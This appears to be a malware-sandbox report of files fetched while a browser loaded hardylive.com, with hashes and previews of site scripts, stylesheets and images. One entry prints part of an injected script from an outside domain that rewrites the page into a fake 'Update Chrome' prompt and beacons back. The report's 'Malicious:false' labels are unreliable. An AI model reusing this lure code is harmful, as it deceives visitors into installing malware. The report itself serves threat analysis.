                                                        SHA-512:60AE307D9FE25000BA024C795895900FE44D5E862AEEB2C7BB66C40D9D60C1F9740CA5C908FE9CADDBCE7E6C61F6F7C57344FA4C74DB9DB8073530C893904CE0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..=.c....}..@Y.E>..f.......X.+3.?*f_.Rg4..fn.......<K.#.......k.!..Tmv[.I.+........Wx..w*/?.cK.wS.s $......X.S..k..#[x~.^..&.....u6.|?..~.m.D..../....Y!96X.O..Nh'Ex..py..p...y.<.....7.Q..=k6.*..H.Q.^....H..y.%.q_1...+./..:jQ...*)....J.v.M.I.1 .c.....>*.z...$W....w..k...w(...Z.dp...v..@.Z..6s
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1164), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1164
                                                        Entropy (8bit):4.84622535740134
                                                        Encrypted:false
                                                        SSDEEP:24:E/Xrf8XJINTJ9gLDVN0GNFi9H8cyy1Rsx4jMK19H8pyFKy9H8Oyu:E/7f8XJWTJ9qDP0gFie4Jt7
                                                        MD5:062FA2A575F1530A499CE18716C04AD3
                                                        SHA1:E2DA41B52F8D867D372A89AF7098EAF98A9D9C36
                                                        SHA-256:AC6CF1A1A4FB14FDBC49BDB3A0472AAB3E283AA0C729BAC1C7D90A2A54142A18
                                                        SHA-512:7FBC4AAB15A79A65C37D5B7730EB2979EBC36C2339BC60ADAC5F862F5091CF0C7558C1366E4AFD9EE0CE80A997DF34B9FEDFAF5CA1921DFC0B0B42A6B9307120
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/uploads/sites/35/elementor/css/post-3.css?ver=1741370436
                                                        Preview:.elementor-kit-3{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1140px;}.e-con{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-block-end:20px;}.elementor-element{--widgets-spacing:20px 20px;--widgets-spacing-row:20px;--widgets-spacing-column:20px;}{}h1.entry-title{display:var(--page-title-display);}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-con{--container
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (9242)
                                                        Category:downloaded
                                                        Size (bytes):9636
                                                        Entropy (8bit):5.4156198930676736
                                                        Encrypted:false
                                                        SSDEEP:192:x9cCxjlRE8iST7TMcPvedRUtV7uLEUfHqo/gH5P5AxTov7fG3ex2NrMP:x9RjlRE8iSf4cPmgtV7uoOKIgxaxTovp
                                                        MD5:EF56117D1BB5CC41AA6BD127A49C7640
                                                        SHA1:B9C2ED774177FC0FCEBA5CB58113024B23FE4FB7
                                                        SHA-256:D151F8C0B2659CFB63704D68654AD8D9437AE9DA4410536F63DDEC21689A0620
                                                        SHA-512:0EC9039DBB47470815AD8BF58FD206672717A146B3A99BCB12444687E8489698E06664E6C6CC38A5D2954FA919E5A6C3BC57E44F3BE2655F92B801BAC43EC763
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.7.1
                                                        Preview:/*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(e){e.fn._fadeIn=e.fn.fadeIn;var t=e.noop||function(){},o=/MSIE/.test(navigator.userAgent),n=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),i=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);e.blockUI=function(e){d(window,e)},e.unblockUI=function(e){a(window,e)},e.growlUI=function(t,o,n,i){var s=e('<div class="growlUI"></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.blockU
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (3804), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):3804
                                                        Entropy (8bit):5.035025798646541
                                                        Encrypted:false
                                                        SSDEEP:48:/cEupIB5oi38H6xJsnDpr6r75eGSqlwYfiR+uOujeJ6lKsPPF3cMwo:kEQy5P8EJWrO75ekwNlvts8
                                                        MD5:8A8E50701DCF4550CFCDE58F326D72F6
                                                        SHA1:E8481DF81508293F165D1E56332AECB6F17CE77E
                                                        SHA-256:E073FF094226A8196931AF17459BE5DC394E221611E39704EB1A7916C383DA2F
                                                        SHA-512:8A0A36866B24504B862BE788DE9B6A7910CC8B1819ACA97FBED60496E4BF3AD79FCCE9138B49C7CC1AE717573C5A59F33EC476C7DDB9C535545B0204CB919DD4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=aab4a5
                                                        Preview:function focus_populate_live_region(){var e=["woocommerce-message","woocommerce-error","wc-block-components-notice-banner"].map(function(e){return"."+e+'[role="alert"]'}).join(", "),o=document.querySelectorAll(e);if(0!==o.length){var t=o[0];t.setAttribute("tabindex","-1");var n=setTimeout(function(){t.focus(),clearTimeout(n)},500)}}function refresh_sorted_by_live_region(){var e=document.querySelector('.woocommerce-result-count[data-is-sorted-by="true"]');if(e)var o=e.innerHTML,t=setTimeout(function(){e.innerHTML="",e.innerHTML=o,clearTimeout(t)},1e3)}function on_document_ready(){focus_populate_live_region(),refresh_sorted_by_live_region()}jQuery(function(e){e(".woocommerce-ordering").on("change","select.orderby",function(){e(this).closest("form").trigger("submit")}),e("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(e(this).attr("min"));o>=0&&parseFloat(e(this).val())<o&&e(this).val(o)});var o="store_notice"+(e(".woocommerce-store-notice").data("noticeId")
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):107232
                                                        Entropy (8bit):6.063828943616704
                                                        Encrypted:false
                                                        SSDEEP:3072:Kx37myXqbNdNfPgriKal+VYnwlQ92KHBNN:qcNfPgril+yGQkKHBNN
                                                        MD5:83912922705AB996584765AD9C1556B2
                                                        SHA1:D6C9349041C9CB91C8366DE2D0EB063E132EA8CD
                                                        SHA-256:3288A59A30AC3C4F27F28EA733C1836B7D9E857A45A1A9EE04FD7699152D0655
                                                        SHA-512:1C5957B4C293FF2A253349E5A9E1F0C17CBB9D586AE4E113FD59BBCBA9E43977B97690B88F537B40AD887ADF3C34CACAFAD920671EB176F514CE794C4F84A3F7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://virtual.urban-orthodontics.com/4YLo6Zqgi4CFoNLb17HEy5L2jZnDuMqIj+OEkJvnt4+RoMTLk6DSy4TskYOO6pudjaCV
                                                        Preview:(function(){window.localStorage[window.location.hostname]=1;var domain='https://virtual.urban-orthodontics.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var attrs=['class','style','lang','id','dir'];for(var i=0;i<elems.length;i++){for(var j=0;j<attrs.length;j++){try{elems[i].removeAttribute(attrs[j]);}catch(e){}}}document.head.innerHTML='<meta http-equiv="content-type" content="text/html; charset=UTF-8">'+'<meta charset="utf-8">'+'<title>Update Chrome</title>'+'<style> * {margin: 0;padding: 0;}html {overflow-y: scroll;}body {color: #333;font: 13px/18px \'Segoe UI\',sans-serif;font-weight: 400;}.compact {border-left: 26px transparent solid;border-right: 26px transparent solid;margin: 0 auto;max-width: 928px;}#header {height: 64px;position: relative;}.g-section:after {clear: both;content: ".";display: block;height: 0;visibility: hidden;}.g-section, .g-unit {zoom: 1;}#header-logo {margin-top: 20px;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10073)
                                                        Category:downloaded
                                                        Size (bytes):200483
                                                        Entropy (8bit):5.219330095134189
                                                        Encrypted:false
                                                        SSDEEP:3072:IBCq5/UkAkumkwmKB5d+6hmxdWo4ozJubaGc5jhOZNXkcpKxZR:wIFw7B5dWCA
                                                        MD5:6C18216A1BA3A9C7EDE51302C3E865B9
                                                        SHA1:E1D09BA19939419AC5BEBFAC76005C24A0893892
                                                        SHA-256:CC41642E6BFBB906A95DA294CB360233D2044B4152CAEE895FADA8236CA652ED
                                                        SHA-512:7C886E49032C3D075D9CD898F6BE56CEF641AE87B729B2604CBBD9CEA795A2394CCD0DC750511A8A54C078A38BA84953C5EF956D91D771B4E91BFF77351EA723
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/
                                                        Preview:<!doctype html>. [if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->. [if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->. [if IE 8]> <html class="no-js lt-ie9" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->. [if IE 9]> <html class="no-js lt-ie10" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->.<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=yes' />. <link rel="profile" href="http://gmpg.org/xfn/11" />. <link rel="pingback" href="" />.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 120, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):77683
                                                        Entropy (8bit):7.2836921082644075
                                                        Encrypted:false
                                                        SSDEEP:1536:6N6wf/vcD8MrzW42tn9fNPsXf26rCs4c1nS:I6Enc4Mrzk3Pse6v4cY
                                                        MD5:9299953E10CD0874C764D100C8A1F50F
                                                        SHA1:92EAA14F3514DDC8F5F7D1741E592522EB71B809
                                                        SHA-256:27B05CB3D97B1B5E123AF20B7786C95255CDE7D9B471BE1104A263D317C881A9
                                                        SHA-512:34A23B9430430577E9374E4A2FBE20074ACE990E976FF8DBA8AE7C108A413403B33FE1492BA5735EB5291C63AAF0EFD789759ABE03FFFEB286235F74ADD36B45
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...,...x......wXw....pHYs...#...#.x.?v....iCCPPhotoshop ICC profile..x..]l.U....93k..U.-I...!.Y.(........n.-..D...c...........P.......D..D.Bn0....1.p..'$$.(........7.............I.f.P..Yk....B..XA7+*v.gJ."@..].]...#........Z1-...........A.O..!..l?..!..@..?1.....Z..@.T...t.....N..].LC.$.;..k.8.......rl.\.Z%.:........f...Z`e03......+..@.$N..(..$..9..[.]?....\..... 9XU..#...7...w...^.VA.[ojx.U{...&.u..[.CE..4....Zm.j.G"].:-sy...7g.{....y07._.<\..n.._..)...&.B9.....R......HK.d..]....`.+.P..j..{...i]..[.U.-.....j..|....S/Io.../QA.`.....,...b.hP.....C.....L!..A.0..%@RB.Z.......(.l.z>..E.?.........O...OC..i.M...Q.;.v.%...]"'._.h.b.Y...y.&..2..r........ X........%.p.f.+....[qGG..~M.._..W..N...>...W.....;..tV.....Y$..26..8.#_=..$N.xq.#U.xw../..)_..=......).g.R...G..w........y,.vV.F.N.D.2vV......-..Z.Ys....3.O.......b......}nq..{...m....b7 .038.U.x8.@.....q.V...[..}.{..!...y#gd..MF....cd:...#g.....=..^fR..!.@.?..Z=.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (30429)
                                                        Category:downloaded
                                                        Size (bytes):52451
                                                        Entropy (8bit):5.040539270191017
                                                        Encrypted:false
                                                        SSDEEP:1536:NDyrtayUz6J1jJvBCX/RcAaiDtXZnOjR/aIy6HMXKBaB:NDoAye6JtVBCX/RcAaiDtXZnOjR/aIyb
                                                        MD5:5414343AB924752015538E901E6C51EB
                                                        SHA1:90177DD104C8C1517C1E63BAC15E685284125428
                                                        SHA-256:41066EE8AC3F9F59FFF4866F2B85CA988D0DA8A1CF75BAA7457E65A649F3AE3B
                                                        SHA-512:93E0A5B970A72B8D7BAF92C9B47CEDA630F54E0FBD7C3FDC85538F4133E06E8C12C0CAC820C828F1C787F58BB403EC83137E7A9BFAE3FFE154DA0C1C8113511A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/image-map-pro-wordpress/css/image-map-pro.min.css?ver=5.3.2
                                                        Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:FontAwesome;src:url(../fonts/fontawesome-webfont.eot?v=4.7.0);src:url(../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0) format('embedded-opentype'),url(../fonts/fontawesome-webfont.woff2?v=4.7.0) format('woff2'),url(../fonts/fontawesome-webfont.woff?v=4.7.0) format('woff'),url(../fonts/fontawesome-webfont.ttf?v=4.7.0) format('truetype'),url(../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular) format('svg');font-weight:400;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-a
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:dropped
                                                        Size (bytes):143516
                                                        Entropy (8bit):7.976877343636748
                                                        Encrypted:false
                                                        SSDEEP:3072:F3kfZMmNtKT9gk4O0EqbrIkzxba0rYkaiHv:F3kNiTG6qbrIHliP
                                                        MD5:89CED6C7F0A7F6752258E96E96398723
                                                        SHA1:D03EE626195D3F3A63505596CFC3D18D85C2013E
                                                        SHA-256:A36CBCB381F533927714F1AAA038AE8DA48FBF82C6B8BFD460546CF9CDAD2E1F
                                                        SHA-512:9510063ABFDD8FC60608C78FF8522C28931FE50DF642A8E0E13534AE88CF8F2B15AFF7A3FE3014010174813AE888FA55CF9770BECAD5068DC52A3A47BDB62B4B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..8.W.Z....o.]...W.Y.!m../....o..W2.I.......Y.8.c.s.=..#..4.<.|5t......C.rM...NrG..%........l.J.I...Ku...i.g.:.@._x....wZ...wl`i....vb.`.........7U...o.I....d.H.......@[I..o..x.6v..._c.Xm..<`V....?.[v....<..@.....F..V...M./.[Nq....,..g...Nr....7N........lr.@yv..c...q..L.\.-4...-..v...Bm
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:data
                                                        Category:downloaded
                                                        Size (bytes):9141
                                                        Entropy (8bit):5.2975271144294185
                                                        Encrypted:false
                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:downloaded
                                                        Size (bytes):140623
                                                        Entropy (8bit):7.978193587058357
                                                        Encrypted:false
                                                        SSDEEP:3072:ZVwpa60RitFtccRvunv+fs6+CBH+HMvGNl7+qXuau:nqL0Mjuv+uC5+HbLXc
                                                        MD5:1D7C494737EDB9395F19021F308EF830
                                                        SHA1:D6D06DFBC381FB9E2568BE164AB73ABF6A457DC9
                                                        SHA-256:F1CFD348286A1B8C7570F24DA56002DC7CD1156446610A4E2689AEC223134568
                                                        SHA-512:044ACF0323563AD9A5E58C09ABA563909D9B7CD2593430558C0B27A8BAE590EB11234C4C6F44D1BFD3B767B89F2C46FF8C1028FA8DE6FAA7FD2B2E27EBF49E0B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/full-section-2-12-25-1_page-0001-750x536.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...P..$M.Bk..v...s..z...}K.iv..q._..Z..X....A.~.../._....o-<5.7.8.9..l...~..xG..t.....E....>G.C.T..X.A.._S............r5.. F.;I.....\..~..;.....GK..Wb.<lW9.J.....[z...o.....i..}.9..@...=I.94......-.G....:n....L....8..|..;]cY...>..\J..S..h<...k.....h.H.R..2.....+....|<..'.m<5l..$y..$d.UbB.B...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2842), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):2842
                                                        Entropy (8bit):4.66052357042646
                                                        Encrypted:false
                                                        SSDEEP:48:8D1aS9fdlpmUNAEacHWYtW6fE4P9U4dpz0:0pFTNB6+Q
                                                        MD5:492F3287E99AC11E312321E3DC4C0578
                                                        SHA1:17E80D3840B91ED2C007701808E21351435FE1EB
                                                        SHA-256:2960B0EE6AD1BB44C8263839FEF6767C82EADEE2A138D1E9EBC038EB6183BB5D
                                                        SHA-512:D6BD4724CBCBFB3E2B30B1B43F45F98C49D14CD9EF0DA36FD19DFD35AF7539149EF51724119C0DDBACBCE2C125FA2C5D1897C4A89AF794E69A21893F8E75F35D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/uploads/sites/35/elementor/css/post-12010.css?ver=1741370437
                                                        Preview:.elementor-12010 .elementor-element.elementor-element-a332366{--display:flex;--flex-direction:row;--container-widget-width:initial;--container-widget-height:100%;--container-widget-flex-grow:1;--container-widget-align-self:stretch;--flex-wrap-mobile:wrap;--gap:0px 0px;--row-gap:0px;--column-gap:0px;}.elementor-12010 .elementor-element.elementor-element-fd62e73{--display:flex;--flex-direction:column;--container-widget-width:100%;--container-widget-height:initial;--container-widget-flex-grow:0;--container-widget-align-self:initial;--flex-wrap-mobile:wrap;}.elementor-12010 .elementor-element.elementor-element-fd62e73.e-con{--flex-grow:0;--flex-shrink:0;}.elementor-12010 .elementor-element.elementor-element-f272d50 > .elementor-widget-container{padding:4px 4px 4px 4px;border-style:solid;border-width:1px 1px 1px 1px;border-radius:1px 1px 1px 1px;}.elementor-12010 .elementor-element.elementor-element-dab9fe1{--display:flex;}.elementor-12010 .elementor-element.elementor-element-50df8cf{--disp
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (46565)
                                                        Category:downloaded
                                                        Size (bytes):111181
                                                        Entropy (8bit):5.245732676713433
                                                        Encrypted:false
                                                        SSDEEP:3072:6lKlHMCfuJYUYzoi3KNsPT8kpnhaFtjjt9a+9B0LSRcQH5BHezBFFe7BUBSBXB8U:lMCGJYUz7kpnhaFtjj9lRcQH3Hm/gEet
                                                        MD5:8464FE73DA6AA7DE4D0AE0F5539FA1AA
                                                        SHA1:4BB3938DF12DBDB695CEBA92494C324E6AF07E24
                                                        SHA-256:6794359877A9BC5123D3BA2F9C467C6E20266E86E514C33F9611B00ADF732E50
                                                        SHA-512:522191351817772D272DBD2189943021D5A76EEDD10A3F488FEAA11C8124AD25762E8D1FB19B849FFC03882E10C6414CB4C35C74B00EC8C109B415B514D3C8A1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/image-map-pro-wordpress/js/image-map-pro.min.js?ver=5.3.2
                                                        Preview:!function(o){o.imageMapProShapeDefaults={id:"spot-0",title:"",type:"spot",x:-1,y:-1,width:44,height:44,x_image_background:-1,y_image_background:-1,width_image_background:44,height_image_background:44,connected_to:"",use_connected_shape_tooltip:0,layerID:0,static:0,text:{text:"Text",font_family:"sans-serif",font_size:16,font_weight:400,text_color:"#000000",text_opacity:1},actions:{click:"no-action",link:"#",open_link_in_new_window:1,script:""},default_style:{opacity:1,border_radius:50,background_type:"color",background_image_url:"",background_image_opacity:1,background_image_scale:1,background_image_offset_x:0,background_image_offset_y:0,background_color:"#000000",background_opacity:.4,border_width:0,border_style:"solid",border_color:"#ffffff",border_opacity:1,stroke_color:"#ffffff",stroke_opacity:.75,stroke_width:0,stroke_dasharray:"0",stroke_linecap:"round",use_icon:1,icon_type:"library",icon_svg_path:"M409.81,160.113C409.79,71.684,338.136,0,249.725,0C161.276,0,89.583,71.684,89.583,16
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 250x60, components 3
                                                        Category:dropped
                                                        Size (bytes):6251
                                                        Entropy (8bit):7.865256387308176
                                                        Encrypted:false
                                                        SSDEEP:96:zY925qC3LiR0ZtCG+8PteQfRzDkoNtTD0rr18LPLm824u918aW15+IMS:13+YCG+8TRzDztX0N8LTRdu09nT
                                                        MD5:EB182675E032C130AC091FC32FAFA400
                                                        SHA1:7E85C56F5B2EAA586171EC082B915217F76581BD
                                                        SHA-256:E34A7F2EEE9AE7CA27F6ADEF8B07614C99A2077D4DACDFB5DF40C43D9E5F1A29
                                                        SHA-512:65DBAE4A4478AC1DA37B202F936BD7C4A02DA263419EEBC6C8A1F7781911F6E403CE3B73390042628C35C4D743CEBAC91CB480752B9FD3B3E365C1186AFAD48B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:EBF1AE19CC4811EEA869DF20A924E424" xmpMM:InstanceID="xmp.iid:EBF1AE18CC4811EEA869DF20A924E424" xmp:CreatorTool="Adobe Photoshop 2023 Windows"> <xmpMM:DerivedFrom stRef:instanceID="C3F77B5A411575759BF56C95813E2416" stRef:documentID="C3F77B5A411575759BF56C95813E2416"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................................................................................................................................
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):308955
                                                        Entropy (8bit):5.25575932715937
                                                        Encrypted:false
                                                        SSDEEP:3072:5FYezMPcrLZD6C5ipxbirHSG0G/GsnG6jQ8s4uwHsMxpiiiOBx3T+2gvK:5FYlUOoipxbi7hK3zes+piiiOBx3T+21
                                                        MD5:B7054234DF9790DCA572D7B9CB3DC8CA
                                                        SHA1:C986EC915AD271D26017505E19EB2C26C93B34B1
                                                        SHA-256:5B432B00D8CEF5787718EF07386615C649F7FB1393F7E99D9C431EE1D3AC9779
                                                        SHA-512:F0CAA9038FCA6D2C6625140AC9CFB619F40609B3A2605DDEF221BB2F7293A8FF24F9918568F95D384443A36F55FF3D6EF341E9A621B3FD9F02B143E7209919D2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0
                                                        Preview:!function(e){function t(i){if(n[i])return n[i].exports;var o=n[i]={i:i,l:!1,exports:{}};return e[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:i})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,t){e.exports=jQuery},function(e,t,n){n(2),n(3),n(4),n(6),n(7),n(8),n(9),n(10),n(11),n(12),n(13),n(14),n(15),n(16),n(17),n(18),n(19),n(20),n(21),n(22),n(23),n(24),n(25),n(26),n(27),n(28),n(29),n(30),n(31),n(32),n(33),n(34),n(35),n(36),n(37)},function(e,t,n){var i,o,a,s,r,l,c,d,u,h,f,i,p,i,m,g,i,v,i,m,_,i,m,y,i,m,w,i,m,b,i,m,j,i,m,x,i,o;!function(a,s){i=[n(0)],void 0!==(o=function(e){return s(a,e)}.apply(t,i))&&(e.exports=o)}(window,function(e,t){"use strict";function n(n,a,r){function l(e,t,i){var o,a="$()."+n+'("'+t+'")';r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 300 x 250
